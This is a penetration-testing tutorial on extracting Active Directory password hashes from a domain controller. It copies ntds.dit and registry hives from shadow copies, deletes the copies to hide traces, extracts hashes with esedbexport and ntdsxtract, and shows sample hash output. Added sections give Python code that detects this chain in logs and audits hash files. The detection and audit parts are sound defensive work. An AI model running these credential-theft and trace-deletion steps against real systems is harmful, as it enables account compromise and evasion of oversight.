Getting Hashes from NTDS.dit File

Over the many internal penetration tests we have completed for clients, we have always wanted to collect the NTDS.dit file from a domain controller once we gain access to one. The primary reason to pull this file from a Windows Domain Controller is to obtain the password of another account (in order to reach the data we are actually after). Generally, the coveted access is to an MSSQL database or some application that Domain Admins cannot access but other domain users can.

Some people might ask why we would not just change the password of the account we were after, since we were already the Domain Administrator. The answer is that changing passwords on accounts could alert users or administrators that something is happening.

This post is written with the expectation that the reader has some technical knowledge of Windows systems and of the processes involved in installing and using software.

Once you have access to a domain controller, the first step is to copy the needed files from the Volume Shadow Copy or create a copy if needed. We generally prefer to create a new copy so we know it has the latest information.

Get ntds.dit and SYSTEM from Volume Shadow Copy on Host

Luckily, Windows has built-in tools to assist with collecting the files needed.

Vssadmin tool

List Volume Shadow Copies on the system:

C:\>vssadmin list shadows

Example: 'vssadmin list shadows' with no shadows available:

C:\>vssadmin list shadows
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

No items found that satisfy the query.

Create a new Volume Shadow Copy of the current drive:

C:\>vssadmin create shadow /for=C:

Example: 'vssadmin create shadow' output:

C:\>vssadmin create shadow /for=c:
vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001 Microsoft Corp.

Successfully created shadow copy for 'c:\'
Shadow Copy ID: {e8eb7931-5056-4f7d-a5d7-05c30da3e1b3}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

Pull files from the Volume Shadow Copy (examples):

The copy command for a file in the volume shadow copy looks like the line below:

copy \\?\GLOBALROOT\Device\<SHADOW COPY DISK>\windows\<directory>\<File> <where to put file>

NOTE: The dot (.) at the end of the copy line will place the file in your current working directory.

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\ntds\ntds.dit .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SYSTEM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy[X]\windows\system32\config\SAM .

[X] refers to the shadow copy number. In the example above the latest version is HarddiskVolumeShadowCopy1 (there could be multiple copies; use the last one listed).

Registry Save

We also recommend getting a current copy of SYSTEM from the registry, just in case. There have been times when the SYSTEM file from the shadow copy was corrupt.

reg SAVE HKLM\SYSTEM c:\SYS

Delete the shadows to cover your tracks:

vssadmin delete shadows /for= [/oldest | /all | /shadow=] [/quiet]

EXAMPLE:

vssadmin delete shadows /for=C: /shadow=e8eb7931-5056-4f7d-a5d7-05c30da3e1b3
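From the defender's side, every step above (creating a shadow copy, copying ntds.dit or the SYSTEM/SAM hives out of it, saving the SYSTEM hive with reg, then deleting the shadow copy) leaves a command line in process-creation telemetry. The following is an added example, not code from the original post: a small Python detection that runs the rules over constructed, hypothetical process-creation records (modelled on the fields a Sysmon Event ID 1 or Security 4688 event carries) and only reports a host as a likely NTDS dump when the shadow-copy creation is followed by a read of ntds.dit or a hive from that shadow copy, so a backup agent that merely creates shadow copies does not trip it. Host names, user names and the event records are all made up.

```python
import re
from collections import defaultdict

# Constructed sample process-creation records (hypothetical; modelled on the
# fields a Sysmon Event ID 1 or Security 4688 event would carry). Not real logs.
SAMPLE_EVENTS = [
    {"host": "DC01", "user": "CORP\\jdoe", "cmdline": "vssadmin create shadow /for=C:"},
    {"host": "DC01", "user": "CORP\\jdoe",
     "cmdline": "cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\ntds\\ntds.dit ."},
    {"host": "DC01", "user": "CORP\\jdoe",
     "cmdline": "cmd.exe /c copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\SYSTEM ."},
    {"host": "DC01", "user": "CORP\\jdoe", "cmdline": "reg SAVE HKLM\\SYSTEM c:\\SYS"},
    {"host": "DC01", "user": "CORP\\jdoe",
     "cmdline": "vssadmin delete shadows /for=C: /shadow=e8eb7931-5056-4f7d-a5d7-05c30da3e1b3"},
    {"host": "DC01", "user": "CORP\\jdoe", "cmdline": "vssadmin list shadows"},
    # A file server where a backup agent makes a shadow copy: one rule fires, no chain.
    {"host": "FS02", "user": "NT AUTHORITY\\SYSTEM", "cmdline": "vssadmin create shadow /for=D:"},
    {"host": "FS02", "user": "NT AUTHORITY\\SYSTEM", "cmdline": "backupagent.exe --nightly"},
]

# Each rule: (name, compiled pattern, severity). The patterns key on the command
# lines shown in the post rather than on the process image, so a renamed binary
# still matches as long as the arguments are the same.
RULES = [
    ("vss_create", re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b", re.I), "medium"),
    ("ntds_from_shadow", re.compile(r"HarddiskVolumeShadowCopy\d+\\.*\\ntds\\ntds\.dit\b", re.I), "high"),
    ("hive_from_shadow", re.compile(r"HarddiskVolumeShadowCopy\d+\\.*\\config\\(SYSTEM|SAM)\b", re.I), "high"),
    ("reg_save_system", re.compile(r"\breg(\.exe)?\s+save\s+HKLM\\SYSTEM\b", re.I), "medium"),
    ("vss_delete", re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I), "medium"),
]


def match_cmdline(cmdline):
    """Return the names of all rules whose pattern occurs in one command line."""
    return [name for name, pattern, _ in RULES if pattern.search(cmdline)]


def scan(events):
    """Run every rule over every event; one finding per (event, rule) pair."""
    severity = {name: sev for name, _, sev in RULES}
    findings = []
    for ev in events:
        for name in match_cmdline(ev["cmdline"]):
            findings.append({"host": ev["host"], "user": ev["user"], "rule": name,
                             "severity": severity[name], "cmdline": ev["cmdline"]})
    return findings


def ntds_dump_hosts(findings):
    """Hosts where a shadow copy was created AND ntds.dit or a registry hive was
    read out of a shadow copy. A lone vss_create (backup software) does not qualify."""
    by_host = defaultdict(set)
    for f in findings:
        by_host[f["host"]].add(f["rule"])
    return sorted(host for host, rules in by_host.items()
                  if "vss_create" in rules and rules & {"ntds_from_shadow", "hive_from_shadow"})


if __name__ == "__main__":
    found = scan(SAMPLE_EVENTS)
    for f in found:
        print(f"[{f['severity']:6}] {f['host']} {f['user']} {f['rule']}: {f['cmdline']}")
    print("hosts with a complete NTDS dump chain:", ntds_dump_hosts(found))
```

Two practical points about feeding this with real data: Security event 4688 only carries the command line when "Include command line in process creation events" is enabled under Audit Process Creation, and because `copy` is a cmd.exe builtin, the shadow-copy path shows up on the cmd.exe process, not on a separate copy process. Correlating on host (and, in practice, on a short time window) is what keeps the "vssadmin create shadow" rule from paging on every backup job.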

Optional VSSOwn Script to help with this task:

We generally do not try to move files onto the system we compromised.

VSSOwn script:

http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs

Now that you have the files, move them to your host. There are many methods for doing this, use your favorite.

Now that you have the files on your host, it is time to get the hashes.

Utilities needed:

  • libesedb
  • ntdsxtract

libesedb

Download libesedb (use whichever of the methods below you are comfortable with):

Release Code:

https://github.com/libyal/libesedb/releases

(Download and unzip)

Compile Code:

https://github.com/libyal/libesedb

https://github.com/libyal/libesedb/wiki/Building

git clone https://github.com/libyal/libesedb.git
cd libesedb/
./configure
make

esedbexport usage:
Use esedbexport to export items stored in an Extensible Storage Engine (ESE)
Database (EDB) file

Usage: esedbexport [ -c codepage ] [ -l logfile ] [ -m mode ] [ -t target ] [ -T table_name ] [ -hvV ]

source source: the source file

-c: codepage of ASCII strings, options: ascii, windows-874,
windows-932, windows-936, windows-1250, windows-1251,
windows-1252 (default), windows-1253, windows-1254
windows-1255, windows-1256, windows-1257 or windows-1258
-h: shows this help
-l: logs information about the exported items
-m: export mode, option: all, tables (default)
'all' exports all the tables or a single specified table with indexes,
'tables' exports all the tables or a single specified table
-t: specify the basename of the target directory to export to
(default is the source filename) esedbexport will add the suffix
.export to the basename
-T: exports only a specific table
-v: verbose output to stderr
-V: print version

Running esedbexport to extract ntds.dit data:

./esedbexport -t <Directory to export data to (.export will be added to the end)> <ntds.dit file>

EXAMPLE:

# ./esedbexport -t ~/ntds ~/ntds.dit
esedbexport 20150409

Opening file.
Exporting table 1 (MSysObjects) out of 11.
Exporting table 2 (MSysObjectsShadow) out of 11.
Exporting table 3 (MSysUnicodeFixupVer1) out of 11.
Exporting table 4 (datatable) out of 11.
Exporting table 5 (link_table) out of 11.
Exporting table 6 (hiddentable) out of 11.
Exporting table 7 (sdproptable) out of 11.
Exporting table 8 (sd_table) out of 11.
Exporting table 9 (quota_table) out of 11.
Exporting table 10 (quota_rebuild_progress_table) out of 11.
Exporting table 11 (MSysDefrag1) out of 11.
Export completed.

(Depending on the number of user accounts this can take some time to generate)
Extracted files:

# ls ~/ntds.export/
MSysObjects.0
MSysObjectsShadow.1
MSysUnicodeFixupVer1.2
datatable.3
link_table.4
hiddentable.5
sdproptable.6
sd_table.7
quota_table.8
quota_rebuild_progress_table.9
MSysDefrag1.10

NTDSXtract:
http://www.ntdsxtract.com/

CURRENT BUILD:
https://github.com/csababarta/ntdsxtract

git clone https://github.com/csababarta/ntdsxtract.git

Usage for dsusers.py
DSUsers v1.3.3
Extracts information related to user objects

usage: ./dsusers.py [option] datatable
The path to the file called datatable extracted by esedbexport
linktable
The path to the file called linktable extracted by esedbexport
work directory
The path to the directory where ntdsxtract should store its cache files and output files. If the directory does not exist it will be created.

options:
--sid
List user identified by SID
--guid
List user identified by GUID
--name
List user identified by the regular expression
--active
List only active accounts
--locked
List only locked accounts
--syshive
Required for password hash and history extraction
This option should be specified before the password hash
and password history extraction options!
--lmoutfile
--ntoutfile
--pwdformat
ophc - OphCrack format
When this format is specified the NT output file will be used
john - John The Ripper format
ocl - oclHashcat format
When this format is specified the NT output file will be used
--passwordhashes
Extract password hashes
--passwordhistory
Extract password history
--certificates
Extract certificates
--supplcreds
Extract supplemental credentials (e.g.: clear text passwords,
kerberos keys)
--membership
List groups of which the user is a member
--csvoutfile
The filename of the csv file to which ntdsxtract should write the
output
--debug
Turn on detailed error messages and stack trace

Extracting user info:
python dsusers.py [option] (datatable and linktable are from the previously extracted files)

--lmoutfile (output file for LM hashes)
--ntoutfile (output file for NTLM hashes)
--pwdformat john (output in JTR format)
--syshive (SYSTEM file from the system where the NTDS.dit was retrieved)

# python dsusers.py <DATATABLE FILE> <LINKTABLE FILE> <DIRECTORY TO WORK IN> --passwordhashes --lmoutfile <LM OUT FILE> --ntoutfile <NTLM OUT FILE> --pwdformat john --syshive <SYSTEM FILE>

(Add --passwordhistory to get previous hashes for each user; the number of hashes per user will vary based on the Domain settings for password history)

Example Output in JTR Format
# python dsusers.py ~/ntds.export/datatable.3 ~/ntds.export/link_table.4 ~/TEMP --passwordhashes --lmoutfile LM.out --ntoutfile NT.out --pwdformat john --syshive ~/SYSTEM
[+] Started at: Wed, 22 Apr 2015 01:47:11 UTC
[+] Started with options:
[-] Extracting password hashes
[-] LM hash output filename: LM.out
[-] NT hash output filename: NT.out
[-] Hash output format: john
The directory (/root/TEMP) specified does not exists!
Would you like to create it? [Y/N] y
[+] Initialising engine...
[+] Loading saved map files (Stage 1)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/offlid.map'
[+] Rebuilding maps...
[+] Scanning database - 100% -> 40933 records processed
[+] Sanity checks...
Schema record id: 1481
Schema type id: 10
[+] Extracting schema information - 100% -> 4142 records processed
[+] Loading saved map files (Stage 2)...
[!] Warning: Opening saved maps failed: [Errno 2] No such file or directory: '/root/TEMP/links.map'
[+] Rebuilding maps...
[+] Extracting object links...
List of users:

==============
(This will scroll across the screen for a while depending on the number of accounts in the Domain)

Record ID: 32777
User name: FName LName
User principal name: email@address.net
SAM Account name: name
SAM Account type: SAM_NORMAL_USER_ACCOUNT
GUID: 14a15a2a-887a-4444-a54a-aa6a4a689a00
SID: S-1-5-21-350701555-3721294507-2303513147-3801
When created: 2005-06-01 13:50:37
When changed: 2013-12-12 15:08:12
Account expires: Never
Password last set: 2013-10-07 13:20:19.146593
Last logon: 2013-12-11 18:35:10.166785
Last logon timestamp: 2013-12-12 15:08:12.281517
Bad password time 2013-12-11 00:04:52.446209
Logon count: 6239
Bad password count: 0
User Account Control:
NORMAL_ACCOUNT
Ancestors:
$ROOT_OBJECT$ local DOMAIN JOB Users FName LName
Password hashes:
name:$NT$2c8f14b95129b6eb77b1f69d04ff4000:::
name:e4c3436ddd1f625c6fede0fa5525f000:::

(Once this finishes you will have the new files with LM hashes and NTLM hashes in your working directory)
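The NT.out and LM.out files are in the john format shown above (`user:$NT$<32 hex>:::` for NT hashes and `user:<32 hex>:::` for LM hashes). The same files that an attacker would feed to a cracker are also what a domain owner wants to audit after an authorised test. The following is an added example, not code from the original post or from ntdsxtract: a Python parser for that format plus an audit that, without cracking anything, flags accounts that still store a real LM hash, accounts with an empty password, and groups of accounts sharing one NT hash (the same password reused). The file contents and hash values embedded below are constructed; the two empty-string hash constants are well-known public values.

```python
import re
from collections import defaultdict

# Well-known hashes of the empty string in each format (public constants).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample contents of NT.out and LM.out in the john format the post
# shows (user:$NT$<hash>::: and user:<hash>:::). All hash values are made up.
NT_OUT = """\
alice:$NT$2c8f14b95129b6eb77b1f69d04ff4000:::
bob:$NT$2c8f14b95129b6eb77b1f69d04ff4000:::
svc_legacy:$NT$31d6cfe0d16ae931b73c59d7e0c089c0:::
carol:$NT$0123456789abcdef0123456789abcdef:::
"""
LM_OUT = """\
alice:aad3b435b51404eeaad3b435b51404ee:::
bob:e4c3436ddd1f625c6fede0fa5525f000:::
svc_legacy:aad3b435b51404eeaad3b435b51404ee:::
carol:aad3b435b51404eeaad3b435b51404ee:::
"""

# One line: account name, optional $NT$ tag, 32 hex digits, three trailing colons.
LINE_RE = re.compile(r"^(?P<user>[^:]+):(?:\$NT\$)?(?P<hash>[0-9a-fA-F]{32}):::$")


def parse_hash_file(text):
    """Map account name -> lowercase 32-hex hash; reject lines that do not fit the format."""
    hashes = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"line {lineno} is not in john pwdump format: {line!r}")
        hashes[m["user"]] = m["hash"].lower()
    return hashes


def audit(nt_text, lm_text):
    """Summarise weak-storage and reuse indicators visible from the hash files alone."""
    nt = parse_hash_file(nt_text)
    lm = parse_hash_file(lm_text)
    # Accounts still storing a real LM hash: LM is trivially brute-forced, so these
    # accounts either predate or violate the "do not store LM hash" policy.
    lm_present = sorted(u for u, h in lm.items() if h != EMPTY_LM)
    # Accounts whose NT hash is the hash of the empty string.
    empty_password = sorted(u for u, h in nt.items() if h == EMPTY_NT)
    # Groups of accounts that share one NT hash, i.e. the same password on several accounts.
    by_hash = defaultdict(list)
    for u, h in nt.items():
        by_hash[h].append(u)
    shared_nt = sorted(sorted(users) for users in by_hash.values() if len(users) > 1)
    return {"accounts": len(nt), "lm_present": lm_present,
            "empty_password": empty_password, "shared_nt": shared_nt}


if __name__ == "__main__":
    for key, value in audit(NT_OUT, LM_OUT).items():
        print(f"{key}: {value}")
```

Any account listed under `lm_present` is the first thing to fix: enabling the "Network security: Do not store LAN Manager hash value on next password change" policy stops new LM hashes from being written, but existing ones only go away when the user next changes their password. The `shared_nt` groups show password reuse across accounts without ever recovering the password, which is usually enough to start a conversation with the account owners.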

Now you have what you need it is time to start cracking passwords to get to that data you wanted.
